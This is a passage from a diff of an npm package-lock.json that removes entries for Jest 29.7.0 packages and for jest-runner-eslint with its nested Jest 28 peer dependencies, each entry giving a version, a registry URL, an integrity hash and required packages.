"^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "dependencies": { - "@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - } - }, - "@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - } - }, - "@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - } - }, - "@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2" - } - }, - "@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - } - }, - "@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinclair/typebox": "^0.24.1" - } - }, - "@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - } - }, - "@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinonjs/commons": "^1.7.0" - } - }, - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true - }, - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true - }, - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "requires": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - } - }, - "diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true - }, - "emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true - }, - "expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*" - } - }, - "jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - } - }, - "jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - } - }, - "jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - 